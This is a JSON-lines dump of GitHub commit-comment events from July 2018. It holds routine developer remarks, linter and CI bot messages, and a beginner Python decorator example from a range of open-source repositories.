{"id":"7968870931","type":"CommitCommentEvent","actor":{"login":"MemduhG"},"repo":{"name":"apertium/apertium-uig-tur"},"payload":{"comment":{"id":29716001,"position":25,"line":245,"path":"apertium-uig-tur.uig-tur.dix","commit_id":"5a3276ea242fd8fb10d3a1d8373598f660c058e1","created_at":"2018-07-16T06:36:03Z","updated_at":"2018-07-16T06:36:03Z","author_association":"COLLABORATOR","body":"Is this in the sense of \"interesting\" or something more broad? The Turkish is bit Osmanlı for an end user, I think"}},"created_at":"2018-07-16T06:36:03Z"}
{"id":"7968871773","type":"CommitCommentEvent","actor":{"login":"cyberliem"},"repo":{"name":"KyberNetwork/reserve-data"},"payload":{"comment":{"id":29716005,"position":null,"line":null,"path":null,"commit_id":"04fa1a9b0bbf3856bd0e1d4eb2d9015625d773a9","created_at":"2018-07-16T06:36:18Z","updated_at":"2018-07-16T06:36:18Z","author_association":"CONTRIBUTOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Remove unused token setting fields](https://trello.com/c/W6z4us7N/182-remove-unused-token-setting-fields)"}},"created_at":"2018-07-16T06:36:18Z"}
{"id":"7968873150","type":"CommitCommentEvent","actor":{"login":"MemduhG"},"repo":{"name":"apertium/apertium-uig-tur"},"payload":{"comment":{"id":29716010,"position":68,"line":288,"path":"apertium-uig-tur.uig-tur.dix","commit_id":"5a3276ea242fd8fb10d3a1d8373598f660c058e1","created_at":"2018-07-16T06:36:49Z","updated_at":"2018-07-16T06:36:49Z","author_association":"COLLABORATOR","body":"LR here, Use/MT and RL in tur"}},"created_at":"2018-07-16T06:36:49Z"}
{"id":"7968876023","type":"CommitCommentEvent","actor":{"login":"fredbi"},"repo":{"name":"go-swagger/go-swagger"},"payload":{"comment":{"id":29716015,"position":null,"line":null,"path":null,"commit_id":"ae979c920193ef49ab97a138ff65ed50912f0b0e","created_at":"2018-07-16T06:37:51Z","updated_at":"2018-07-16T06:37:51Z","author_association":"CONTRIBUTOR","body":"Hi. I caught this too. You got ahead by only a couple hours... Nice catch."}},"created_at":"2018-07-16T06:37:51Z"}
{"id":"7968877506","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29716019,"position":null,"line":null,"path":null,"commit_id":"4aa11349ba7dfb3fe5b17286f7dac966065ac4b1","created_at":"2018-07-16T06:38:22Z","updated_at":"2018-07-16T06:38:22Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-location](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-location).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-location-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-16T06:38:22Z"}
{"id":"7968878626","type":"CommitCommentEvent","actor":{"login":"ijohnson222"},"repo":{"name":"HeuristNetwork/heurist"},"payload":{"comment":{"id":29716021,"position":15,"line":785,"path":"admin/setup/dbcreate/blankDBStructure.sql","commit_id":"72e9cd461f6405f33125564be63e873fd7535d66","created_at":"2018-07-16T06:38:46Z","updated_at":"2018-07-16T06:38:46Z","author_association":"MEMBER","body":"thanks. fixed.\n\n\nIan Johnson | Honorary Associate\nThe University of Sydney\nFaculty of Arts and Social Sciences\nRm 316, Old Teachers College A22 | The University of Sydney | NSW | 2006\nM 61 402 389 190 | Fr Apr-Sep 2018 +33 6 95 34 14 66\nE <mailto:firstname.surname@sydney.edu.au> ian.johnson@sydney.edu.au<mailto:ian.johnson@sydney.edu.au>  | HeuristNetwork.org<http://heuristnetwork.org/>  | <http://usyd.academia.edu.au/IanJohnson> sydney.academia.edu/Johnson<http://sydney.academia.edu/Johnson> | sydney.edu.au<http://sydney.edu.au/>\nCRICOS 00026A. This email plus any attachments to it are confidential. Any unauthorised use is strictly prohibited.\nIf you receive this email in error, please delete it and any attachments.\n\n\n\n________________________________\nFrom: Arjen Lentz <notifications@github.com>\nSent: Monday, 16 July 2018 1:28 AM\nTo: HeuristNetwork/heurist\nCc: Subscribed\nSubject: Re: [HeuristNetwork/heurist] usrRecPermissions (72e9cd4)\n\n\nMissing semicolon on line 785\n\n—\nYou are receiving this because you are subscribed to this thread.\nReply to this email directly, view it on GitHub<https://protect-au.mimecast.com/s/J77XC3Q8Z2FLxYP8TghxsZ?domain=github.com>, or mute the thread<https://protect-au.mimecast.com/s/r7n5C4QZ1RFL6AnjTxtaii?domain=github.com>.\n"}},"created_at":"2018-07-16T06:38:46Z"}
{"id":"7968881060","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":29716027,"position":null,"line":null,"path":null,"commit_id":"08cc23e1f17d9661c8bb72b58a516e742003860a","created_at":"2018-07-16T06:39:41Z","updated_at":"2018-07-16T06:39:41Z","author_association":"NONE","body":"[Your benchmark job](https://github.com/JuliaLang/julia/commit/08cc23e1f17d9661c8bb72b58a516e742003860a#commitcomment-29715402) has completed - possible performance regressions were detected. A full report can be found [here](https://github.com/JuliaCI/BaseBenchmarkReports/blob/4cf09002e7192050d82fbed4fd55d88fc26fe507/daily_2018_7_16/report.md). cc @ararslan"}},"created_at":"2018-07-16T06:39:41Z"}
{"id":"7968881646","type":"CommitCommentEvent","actor":{"login":"MemduhG"},"repo":{"name":"apertium/apertium-uig-tur"},"payload":{"comment":{"id":29716028,"position":29,"line":620,"path":"apertium-uig-tur.uig-tur.dix","commit_id":"07a8f98a1aa1d1f76bc178b8068dbbd8e347cac4","created_at":"2018-07-16T06:39:53Z","updated_at":"2018-07-16T06:39:53Z","author_association":"COLLABORATOR","body":"Might be spelled as Efrasiyab in the turkish"}},"created_at":"2018-07-16T06:39:53Z"}
{"id":"7968882282","type":"CommitCommentEvent","actor":{"login":"jpkk623"},"repo":{"name":"masaki0224/inpulse"},"payload":{"comment":{"id":29716030,"position":5,"line":5,"path":"Gemfile","commit_id":"ca26393561c16b9987b3b8e8720ae8e157f0ad43","created_at":"2018-07-16T06:40:08Z","updated_at":"2018-07-16T06:40:08Z","author_association":"NONE","body":"@masaki0224 \r\n\r\nめっちゃ古いで"}},"created_at":"2018-07-16T06:40:08Z"}
{"id":"7968883629","type":"CommitCommentEvent","actor":{"login":"Neredun"},"repo":{"name":"AshamaneProject/AshamaneCore"},"payload":{"comment":{"id":29716033,"position":null,"line":null,"path":null,"commit_id":"277337f692bb134c5afebea286b1ea12aa0dd07a","created_at":"2018-07-16T06:40:36Z","updated_at":"2018-07-16T06:40:36Z","author_association":"NONE","body":"Gilneas has some spawns (at least on live) but players are trapped in one of the first quests (Save Krennan Aranas) and they're some phasing problems where you need to move trough specific places to complete some others (Royal Orders)"}},"created_at":"2018-07-16T06:40:36Z"}
{"id":"7968884712","type":"CommitCommentEvent","actor":{"login":"hxy-gg"},"repo":{"name":"hxy-gg/demo-test-1"},"payload":{"comment":{"id":29716036,"position":3,"line":1,"path":"REAMD.TXT","commit_id":"26fee68e2a05ed45af505e5e7e92f8f08a1fa0c4","created_at":"2018-07-16T06:40:58Z","updated_at":"2018-07-16T06:40:58Z","author_association":"OWNER","body":"你要重写"}},"created_at":"2018-07-16T06:40:58Z"}
{"id":"7968885158","type":"CommitCommentEvent","actor":{"login":"hxy-gg"},"repo":{"name":"hxy-gg/demo-test-1"},"payload":{"comment":{"id":29716039,"position":3,"line":1,"path":"REAMD.TXT","commit_id":"26fee68e2a05ed45af505e5e7e92f8f08a1fa0c4","created_at":"2018-07-16T06:41:08Z","updated_at":"2018-07-16T06:41:08Z","author_association":"OWNER","body":"我重写你妈逼"}},"created_at":"2018-07-16T06:41:08Z"}
{"id":"7968885975","type":"CommitCommentEvent","actor":{"login":"aravindpanil"},"repo":{"name":"aravindpanil/nVipani"},"payload":{"comment":{"id":29716040,"position":null,"line":null,"path":null,"commit_id":"54570f9338203f40c928e005ae25916bb24821c3","created_at":"2018-07-16T06:41:26Z","updated_at":"2018-07-16T06:41:26Z","author_association":"OWNER","body":"@samagnatalanki Modify conf file as required. This is conf file from master with all suites included"}},"created_at":"2018-07-16T06:41:26Z"}
{"id":"7968887017","type":"CommitCommentEvent","actor":{"login":"Racoder143"},"repo":{"name":"EnterpriseDB/zheap"},"payload":{"comment":{"id":29716042,"position":null,"line":null,"path":null,"commit_id":"b80e618a7df90013fb7a47c7055103a3ff462d8b","created_at":"2018-07-16T06:41:49Z","updated_at":"2018-07-16T06:41:49Z","author_association":"COLLABORATOR","body":"Hi,\n\nWe could not reproduce the issue you have mentioned, is it consistently\nreproducible at your end,? Actually, we tried on a couple of systems but it\nis not reproducible, if possible could you try this on some other system as\nwell? Since, there is no doc change as a part of zheap project, so we doubt\nif this issue is an artefact of this part of code, could you try it for\npostgres head as well?\n\nWith regards,\n-Rafia\n\n\nOn Tue, Jul 10, 2018 at 7:03 AM WQPG <notifications@github.com> wrote:\n\n> ./configure --prefix=/opt/zheap --exec-prefix=/opt/zheap\n> --enable-thread_safety --with-pgport=5434 --with-blocksize=32\n> --with-segsize=4 --with-wal-blocksize=32\n> --with-trans-slots-per-zheap-page=16 --with-llvm --with-icu --with-tcl\n> --with-perl --with-python --with-gssapi --with-pam --with-ldap\n> --with-openssl --with-selinux --with-systemd --with-readline\n> --with-ossp-uuid --with-libxml --with-libxslt --with-zlib\n>\n> make -j 6\n> make -j 6 world\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/EnterpriseDB/zheap/commit/b80e618a7df90013fb7a47c7055103a3ff462d8b#commitcomment-29649972>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AMLcNDUThX--iYQ_8YjQ6bnXB_NSKT_wks5uFAR5gaJpZM4VHl7a>\n> .\n>\n"}},"created_at":"2018-07-16T06:41:49Z"}
{"id":"7968889978","type":"CommitCommentEvent","actor":{"login":"downtiser"},"repo":{"name":"downtiser/python-one"},"payload":{"comment":{"id":29716044,"position":null,"line":null,"path":null,"commit_id":"b85c0cdf353399d01aa97ce07ed7b7d80d2cca66","created_at":"2018-07-16T06:42:51Z","updated_at":"2018-07-16T06:42:51Z","author_association":"OWNER","body":"### 含参装饰器：\r\n\r\n```\r\n#Downtiser\r\nimport time\r\nuser_name,passw='downtiser','gu996080'\r\n\r\ndef deco(run_type):\r\n    if run_type=='local':\r\n        def out_wrapper(func):\r\n\r\n            def wrapper(*args, **kwargs):\r\n                print('\\033[32;1mthe local.....\\033[0m')\r\n                name = input('please input your name:')\r\n                password = input('please input your password:')\r\n                print('-----after wrapper-----')\r\n\r\n                if name == user_name and passw == password:\r\n                    start_time = time.time()\r\n                    time_formate = '%Y-%m-%d %X'\r\n\r\n                    res = func(*args, **kwargs)\r\n                    end_time = time.time()\r\n                    print('\\033[32;1m-----login successfully-----%s\\033[0m' % (time.strftime(time_formate)))\r\n                    print('run time:%s' % (end_time - start_time))\r\n                    return res\r\n                else:\r\n                    exit('\\033[31;1minvalid infomation!\\033[0m')\r\n\r\n            return wrapper\r\n        return out_wrapper\r\n    else:\r\n\r\n        def out_wrapper(func):\r\n\r\n            def wrapper(*args, **kwargs):\r\n                print('\\033[32;1mthe online.....\\033[0m')\r\n                name = input('please input your name:')\r\n                password = input('please input your password:')\r\n                print('-----after wrapper-----')\r\n\r\n                if name == user_name and passw == password:\r\n                    start_time = time.time()\r\n                    time_formate = '%Y-%m-%d %X'\r\n\r\n                    res = func(*args, **kwargs)\r\n                    end_time = time.time()\r\n                    print('\\033[32;1m-----login successfully-----%s\\033[0m' % (time.strftime(time_formate)))\r\n                    print('run time:%s' % (end_time - start_time))\r\n                    return res\r\n                else:\r\n                    exit('\\033[31;1minvalid infomation!\\033[0m')\r\n\r\n            return wrapper\r\n        return out_wrapper\r\n\r\n\r\n\r\n\r\n@deco(run_type='local')                                  #等价于：def home_page():\r\ndef home_page():                                         #          time.sleep(1)\r\n    time.sleep(1)                                        #          print('\\033[32;1mwelcome to the login page:\\033[0m')\r\n    print('\\033[32;1mwelcome to the login page:\\033[0m') #          return '\\033[32;1mthis is the your home page\\033[0m'\r\n    return '\\033[32;1mthis is the your home page\\033[0m' #       home_page=deco(run_type='local')(home_page)\r\n                                                         # 即先调用了deco()并传入参数run_type='local',于是运行deco定义了out_wrapper()并返回其地址\r\n                                                         #所以deco(run_time='local')结果就是out_wrapper,只不过多了一个参数run_type，所以可以直接在后面\r\n                                                         #加上（）来调用该函数，所以上语句即homepage=out_wrapper(homepage),最后home还是wrapper,xx可以为任何形式函数，含参或不含参\r\n                                                         #语法糖@xxx 等价于xxx(需要装饰的函数)，其中xxx可以为任何形式函数，含参或不含参，返回值或直接是地址\r\n                                                         #类似于C中的define,调用时只是传递了一个形式,所以用C描述即:define @xxx f=xxx(f)\r\n\r\n\r\n@deco(run_type='online')\r\ndef bbs_page():\r\n    time.sleep(0.5)\r\n    print('\\033[32;1mwelcome to the bbs page:\\033[0m')\r\n    return '\\033[32;1mwelcone to cc98!\\033[0m'\r\n\r\nprint(home_page())\r\nprint('----------------分割线--------------')\r\nprint(bbs_page())\r\n```\r\n\r\n"}},"created_at":"2018-07-16T06:42:51Z"}
{"id":"7968890170","type":"CommitCommentEvent","actor":{"login":"at-dev-support-01"},"repo":{"name":"akaj-team/intern-18-summer"},"payload":{"comment":{"id":29716046,"position":4,"line":null,"path":"app/src/at-thanhhoang/java/asiantech/internship/summer/MenuActivity.java","commit_id":"c5bc0bb9f1d5d203c99e15896edb86245cb680ef","created_at":"2018-07-16T06:42:55Z","updated_at":"2018-07-16T06:42:55Z","author_association":"NONE","body":"WARNING: [UnusedImports] Avoid unused imports such as 'android.widget.Toast'\nhttps://pmd.github.io/pmd-5.6.1/pmd-java/rules/java/imports.html#UnusedImports"}},"created_at":"2018-07-16T06:42:55Z"}
{"id":"7968890181","type":"CommitCommentEvent","actor":{"login":"at-dev-support-01"},"repo":{"name":"akaj-team/intern-18-summer"},"payload":{"comment":{"id":29716047,"position":103,"line":null,"path":"app/src/at-thanhhoang/java/asiantech/internship/summer/asynctask_thread_handler/fragment/AsyncTaskFragment.java","commit_id":"c5bc0bb9f1d5d203c99e15896edb86245cb680ef","created_at":"2018-07-16T06:42:56Z","updated_at":"2018-07-16T06:42:56Z","author_association":"NONE","body":"WARNING: [AvoidPrintStackTrace] Avoid printStackTrace(); use a logger call instead.\nhttps://pmd.github.io/pmd-5.6.1/pmd-java/rules/java/logging-java.html#AvoidPrintStackTrace"}},"created_at":"2018-07-16T06:42:56Z"}
{"id":"7968890192","type":"CommitCommentEvent","actor":{"login":"at-dev-support-01"},"repo":{"name":"akaj-team/intern-18-summer"},"payload":{"comment":{"id":29716048,"position":7,"line":null,"path":"app/src/at-thanhhoang/java/asiantech/internship/summer/asynctask_thread_handler/fragment/HandlerFragment.java","commit_id":"c5bc0bb9f1d5d203c99e15896edb86245cb680ef","created_at":"2018-07-16T06:42:56Z","updated_at":"2018-07-16T06:42:56Z","author_association":"NONE","body":"WARNING: [UnusedImports] Avoid unused imports such as 'android.graphics.drawable.Drawable'\nhttps://pmd.github.io/pmd-5.6.1/pmd-java/rules/java/imports.html#UnusedImports"}},"created_at":"2018-07-16T06:42:56Z"}
{"id":"7968890201","type":"CommitCommentEvent","actor":{"login":"at-dev-support-01"},"repo":{"name":"akaj-team/intern-18-summer"},"payload":{"comment":{"id":29716049,"position":87,"line":null,"path":"app/src/at-thanhhoang/java/asiantech/internship/summer/asynctask_thread_handler/fragment/HandlerFragment.java","commit_id":"c5bc0bb9f1d5d203c99e15896edb86245cb680ef","created_at":"2018-07-16T06:42:56Z","updated_at":"2018-07-16T06:42:56Z","author_association":"NONE","body":"ERROR: [SystemPrintln] System.out.println is used\nhttps://pmd.github.io/pmd-5.6.1/pmd-java/rules/java/logging-java.html#SystemPrintln"}},"created_at":"2018-07-16T06:42:56Z"}
{"id":"7968890211","type":"CommitCommentEvent","actor":{"login":"at-dev-support-01"},"repo":{"name":"akaj-team/intern-18-summer"},"payload":{"comment":{"id":29716050,"position":127,"line":null,"path":"app/src/at-thanhhoang/java/asiantech/internship/summer/asynctask_thread_handler/fragment/HandlerFragment.java","commit_id":"c5bc0bb9f1d5d203c99e15896edb86245cb680ef","created_at":"2018-07-16T06:42:56Z","updated_at":"2018-07-16T06:42:56Z","author_association":"NONE","body":"WARNING: [AvoidPrintStackTrace] Avoid printStackTrace(); use a logger call instead.\nhttps://pmd.github.io/pmd-5.6.1/pmd-java/rules/java/logging-java.html#AvoidPrintStackTrace"}},"created_at":"2018-07-16T06:42:56Z"}
{"id":"7968890219","type":"CommitCommentEvent","actor":{"login":"at-dev-support-01"},"repo":{"name":"akaj-team/intern-18-summer"},"payload":{"comment":{"id":29716051,"position":102,"line":null,"path":"app/src/at-thanhhoang/java/asiantech/internship/summer/asynctask_thread_handler/fragment/ThreadFragment.java","commit_id":"c5bc0bb9f1d5d203c99e15896edb86245cb680ef","created_at":"2018-07-16T06:42:56Z","updated_at":"2018-07-16T06:42:56Z","author_association":"NONE","body":"WARNING: [AvoidPrintStackTrace] Avoid printStackTrace(); use a logger call instead.\nhttps://pmd.github.io/pmd-5.6.1/pmd-java/rules/java/logging-java.html#AvoidPrintStackTrace"}},"created_at":"2018-07-16T06:42:56Z"}
{"id":"7968890225","type":"CommitCommentEvent","actor":{"login":"at-dev-support-01"},"repo":{"name":"akaj-team/intern-18-summer"},"payload":{"comment":{"id":29716052,"position":125,"line":null,"path":"app/src/at-thanhhoang/java/asiantech/internship/summer/asynctask_thread_handler/fragment/ThreadFragment.java","commit_id":"c5bc0bb9f1d5d203c99e15896edb86245cb680ef","created_at":"2018-07-16T06:42:57Z","updated_at":"2018-07-16T06:42:57Z","author_association":"NONE","body":"WARNING: [AvoidPrintStackTrace] Avoid printStackTrace(); use a logger call instead.\nhttps://pmd.github.io/pmd-5.6.1/pmd-java/rules/java/logging-java.html#AvoidPrintStackTrace"}},"created_at":"2018-07-16T06:42:57Z"}
{"id":"7968897733","type":"CommitCommentEvent","actor":{"login":"pierre"},"repo":{"name":"killbill/killbill-stripe-plugin"},"payload":{"comment":{"id":29716062,"position":null,"line":null,"path":null,"commit_id":"0d79f160b9b619abaf7dd4fad2d31e21a708d1f8","created_at":"2018-07-16T06:45:31Z","updated_at":"2018-07-16T06:45:31Z","author_association":"MEMBER","body":"5.0.0 actually pulls an older version of `killbill-api` and `killbill` gem (for 0.19.17). I'll create the 6.0.0 release."}},"created_at":"2018-07-16T06:45:31Z"}
{"id":"7968898267","type":"CommitCommentEvent","actor":{"login":"robertsLando"},"repo":{"name":"robertsLando/node-red-contrib-m-bus"},"payload":{"comment":{"id":29716063,"position":null,"line":null,"path":null,"commit_id":"f9eebce93b8853c71658ff49c0d0ec4273fd6014","created_at":"2018-07-16T06:45:44Z","updated_at":"2018-07-16T06:45:44Z","author_association":"OWNER","body":"Should fix #1 "}},"created_at":"2018-07-16T06:45:44Z"}
{"id":"7968901960","type":"CommitCommentEvent","actor":{"login":"geraldb"},"repo":{"name":"openfootball/world-cup"},"payload":{"comment":{"id":29716065,"position":null,"line":null,"path":null,"commit_id":"ac98a89b92217be9638e3e8d34686aab22d3d25b","created_at":"2018-07-16T06:47:00Z","updated_at":"2018-07-16T06:47:00Z","author_association":"MEMBER","body":"@hidenobunagai  Thanks again for your help and your updates. Greatly appreciated.  "}},"created_at":"2018-07-16T06:47:00Z"}
{"id":"7968902065","type":"CommitCommentEvent","actor":{"login":"at15"},"repo":{"name":"boylee1111/Mirror2"},"payload":{"comment":{"id":29716066,"position":null,"line":null,"path":null,"commit_id":"ccaaeb55cbe0917dba5e7cf535750e893359b5b4","created_at":"2018-07-16T06:47:03Z","updated_at":"2018-07-16T06:47:03Z","author_association":"NONE","body":".... 你这是刷完题开始刷 commit 了么 ... "}},"created_at":"2018-07-16T06:47:03Z"}
{"id":"7968903261","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/python-gflags-feedstock"},"payload":{"comment":{"id":29716069,"position":null,"line":null,"path":null,"commit_id":"c0034f73feaef5143691d8d4f72959bf734a2733","created_at":"2018-07-16T06:47:28Z","updated_at":"2018-07-16T06:47:28Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @sdvillal were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-16T06:47:28Z"}
{"id":"7968905231","type":"CommitCommentEvent","actor":{"login":"dyusuf"},"repo":{"name":"bornabesic/cytokine-graph-db"},"payload":{"comment":{"id":29716071,"position":null,"line":null,"path":null,"commit_id":"eba3bc32b7dccfc2673c330cb159ceca0ee34db8","created_at":"2018-07-16T06:48:07Z","updated_at":"2018-07-16T06:48:07Z","author_association":"COLLABORATOR","body":"I have again looked at the issue. yesterday's suggestion could still be improved for including the functional context such as pathway.\r\n\r\nbefore we go further, we need a brainstorm on a proper design.\r\n\r\nplease come over today and let's play with it.\r\n\r\nsome useful resources: \r\n\r\nhttps://stackoverflow.com/questions/29731504/what-is-the-best-way-to-store-array-of-strings-as-node-property-in-neo4j\r\n\r\nhttps://neo4j.com/docs/developer-manual/current/cypher/clauses/merge/\r\n\r\n\r\n\r\n"}},"created_at":"2018-07-16T06:48:07Z"}
{"id":"7968905847","type":"CommitCommentEvent","actor":{"login":"geraldb"},"repo":{"name":"openfootball/world-cup"},"payload":{"comment":{"id":29716072,"position":null,"line":null,"path":null,"commit_id":"d7c85dc4df4a41c05668de5c0d00f17d46da1cd0","created_at":"2018-07-16T06:48:19Z","updated_at":"2018-07-16T06:48:19Z","author_association":"MEMBER","body":"@larkov Thanks again for your help and your world cup updates. Greatly appreciated."}},"created_at":"2018-07-16T06:48:19Z"}
{"id":"7968907159","type":"CommitCommentEvent","actor":{"login":"pierre"},"repo":{"name":"killbill/killbill-cloud"},"payload":{"comment":{"id":29716074,"position":null,"line":null,"path":null,"commit_id":"a27e47a38bfecb5afe9af9ac97e09cf99d9c6458","created_at":"2018-07-16T06:48:46Z","updated_at":"2018-07-16T06:48:46Z","author_association":"MEMBER","body":"Same as Stripe, I'll release the plugin (`1.2.4` was for 0.19.17 and isn't quite up-do-date for 0.20.0)."}},"created_at":"2018-07-16T06:48:46Z"}
{"id":"7968908404","type":"CommitCommentEvent","actor":{"login":"geraldb"},"repo":{"name":"openfootball/world-cup"},"payload":{"comment":{"id":29716075,"position":null,"line":null,"path":null,"commit_id":"0161c71731373dd885389a0b427a797fcd7a53b1","created_at":"2018-07-16T06:49:15Z","updated_at":"2018-07-16T06:49:15Z","author_association":"MEMBER","body":"@pratul-nayak  Thanks again for your help and your world cup updates. Greatly appreciated."}},"created_at":"2018-07-16T06:49:15Z"}
{"id":"7968915228","type":"CommitCommentEvent","actor":{"login":"xeji"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29716084,"position":null,"line":null,"path":null,"commit_id":"fd2448b2e6ec49808bb3a92e7ad99ac8318bb8e5","created_at":"2018-07-16T06:51:33Z","updated_at":"2018-07-16T06:51:33Z","author_association":"CONTRIBUTOR","body":"This breaks ofborg eval of the manual because the aerospike module references the aerospike package, which is not supported on aarch64.  Fixed in 8e5dbacd85444892a0588dd6f557d0a14a918c02 by setting platforms to linux. Not a nice fix but unfortunately, we cannot currently set meta.platforms for a module.\r\n\r\ncc @kalbasit @volth @fpletz "}},"created_at":"2018-07-16T06:51:33Z"}
{"id":"7968918315","type":"CommitCommentEvent","actor":{"login":"teodoryantcheff"},"repo":{"name":"teodoryantcheff/OSPy"},"payload":{"comment":{"id":29716088,"position":null,"line":null,"path":null,"commit_id":"8e2f0b15bb35c3ce4ddf43f03b61e35a49721c47","created_at":"2018-07-16T06:52:33Z","updated_at":"2018-07-16T06:52:33Z","author_association":"OWNER","body":"It's all custom made.  What's is in the doc is already in the code in the form of comments to various functions.\r\nBut I honestly don't see how this could be useful for anyone who does not have the radio hardware available :)"}},"created_at":"2018-07-16T06:52:33Z"}
{"id":"7968919132","type":"CommitCommentEvent","actor":{"login":"xingrz"},"repo":{"name":"SuperDroidBond/device_oneplus3"},"payload":{"comment":{"id":29716092,"position":null,"line":null,"path":null,"commit_id":"9c34b04e1df2cb8d7d83db682c8b4ce8c2f4f74f","created_at":"2018-07-16T06:52:49Z","updated_at":"2018-07-16T06:52:49Z","author_association":"NONE","body":"You're welcome :)"}},"created_at":"2018-07-16T06:52:49Z"}
{"id":"7968920542","type":"CommitCommentEvent","actor":{"login":"PCManticore"},"repo":{"name":"PyCQA/pylint"},"payload":{"comment":{"id":29716094,"position":null,"line":null,"path":null,"commit_id":"3a8635a9ef85759f96bfefd8edcd70e223fd12bb","created_at":"2018-07-16T06:53:18Z","updated_at":"2018-07-16T06:53:18Z","author_association":"MEMBER","body":"This was mostly required by Debian and Chromium for having pylint included. Here's more details about this: https://github.com/PyCQA/pylint/issues/894. What I can tell is that I don't necessarily like this process, if there would be an easier way (e.g. move all of them in a single file), I'd be happy to switch to that."}},"created_at":"2018-07-16T06:53:18Z"}
{"id":"7968925277","type":"CommitCommentEvent","actor":{"login":"xianmin"},"repo":{"name":"xianmin/hugo-theme-jane"},"payload":{"comment":{"id":29716098,"position":null,"line":null,"path":null,"commit_id":"b8c640535806cb23a75fc163f26278d351b4ba8e","created_at":"2018-07-16T06:54:54Z","updated_at":"2018-07-16T06:54:54Z","author_association":"OWNER","body":"If using `relLangURL`, there is a bug https://github.com/xianmin/hugo-theme-jane/issues/64 ."}},"created_at":"2018-07-16T06:54:54Z"}
{"id":"7968926114","type":"CommitCommentEvent","actor":{"login":"Andy-TaiHL"},"repo":{"name":"Andy-TaiHL/datasciencecoursera"},"payload":{"comment":{"id":29716099,"position":null,"line":null,"path":null,"commit_id":"464c3e4d0df34fd37306bbdf3f30dc4c90296723","created_at":"2018-07-16T06:55:10Z","updated_at":"2018-07-16T06:55:10Z","author_association":"OWNER","body":"test#1"}},"created_at":"2018-07-16T06:55:10Z"}
{"id":"7968932715","type":"CommitCommentEvent","actor":{"login":"rnaster"},"repo":{"name":"TheNexCloud/NexProphet"},"payload":{"comment":{"id":29716117,"position":null,"line":null,"path":null,"commit_id":"ec0b29b867ae3fd4bc813e8dfcc9f4ed1fcd378e","created_at":"2018-07-16T06:57:22Z","updated_at":"2018-07-16T06:57:22Z","author_association":"COLLABORATOR","body":"fix #8 "}},"created_at":"2018-07-16T06:57:22Z"}
{"id":"7968949367","type":"CommitCommentEvent","actor":{"login":"AdamSmith1020"},"repo":{"name":"LoranKloeze/WhatsAllApp"},"payload":{"comment":{"id":29716181,"position":null,"line":null,"path":null,"commit_id":"c657c9946ce63e80585723c7ad6ac1257d684dfb","created_at":"2018-07-16T07:02:40Z","updated_at":"2018-07-16T07:02:40Z","author_association":"NONE","body":"@LoranKloeze \r\nJust wondering if you have the solution to subscribing to contacts presence without conversation? I have tried everything possible and searched the net but with no success. Many thanks."}},"created_at":"2018-07-16T07:02:40Z"}
{"id":"7968949575","type":"CommitCommentEvent","actor":{"login":"jarlebring"},"repo":{"name":"nep-pack/NonlinearEigenproblems.jl"},"payload":{"comment":{"id":29716182,"position":5,"line":84,"path":"src/method_iar_chebyshev.jl","commit_id":"d7e1566ebe64c782e77fce05f3c1f653cc858873","created_at":"2018-07-16T07:02:44Z","updated_at":"2018-07-16T07:02:44Z","author_association":"CONTRIBUTOR","body":"I don't think this is a natural if-statement. If we use a DEP with compute_y0_method=SPMF, it would compute something completely wrong. "}},"created_at":"2018-07-16T07:02:44Z"}
{"id":"7968949690","type":"CommitCommentEvent","actor":{"login":"edrickhong"},"repo":{"name":"edrickhong/Cu"},"payload":{"comment":{"id":29716183,"position":null,"line":null,"path":null,"commit_id":"9a8f44a0bcf9ae42a3f60a43b104ac6f9702bca0","created_at":"2018-07-16T07:02:46Z","updated_at":"2018-07-16T07:02:46Z","author_association":"OWNER","body":"golem_clean isn't passing. suspect that the ci's version of assimp cannot load the file. We will be replacing assimp to a common version anyway. should be fixed by then"}},"created_at":"2018-07-16T07:02:46Z"}
{"id":"7968950602","type":"CommitCommentEvent","actor":{"login":"fschulze"},"repo":{"name":"gotcha/devpi"},"payload":{"comment":{"id":29716184,"position":null,"line":null,"path":null,"commit_id":"8f255268e904ae834c3b52a9b1c3baa69e463d0f","created_at":"2018-07-16T07:03:04Z","updated_at":"2018-07-16T07:03:04Z","author_association":"COLLABORATOR","body":"I finally remembered why we wanted to store ``requires_python`` separately. It's for compatibility with older releases in case one wants to roll back. If we store the ``require_python`` in ``links``, then older versions can't unpack the 3 item tuple anymore. In the code we should still use the 3 item tuple, but in the database we should store it under the separate key. This still limits the joining and splitting of the tuple to 2 or 3 methods."}},"created_at":"2018-07-16T07:03:04Z"}
{"id":"7968950892","type":"CommitCommentEvent","actor":{"login":"gtm-agent"},"repo":{"name":"zotoio/serverless-central"},"payload":{"comment":{"id":29716185,"position":null,"line":null,"path":null,"commit_id":"f22d107b4329e9420fab10c9c95c808a312cbc9e","created_at":"2018-07-16T07:03:11Z","updated_at":"2018-07-16T07:03:11Z","author_association":"NONE","body":"Task execution failure"}},"created_at":"2018-07-16T07:03:11Z"}
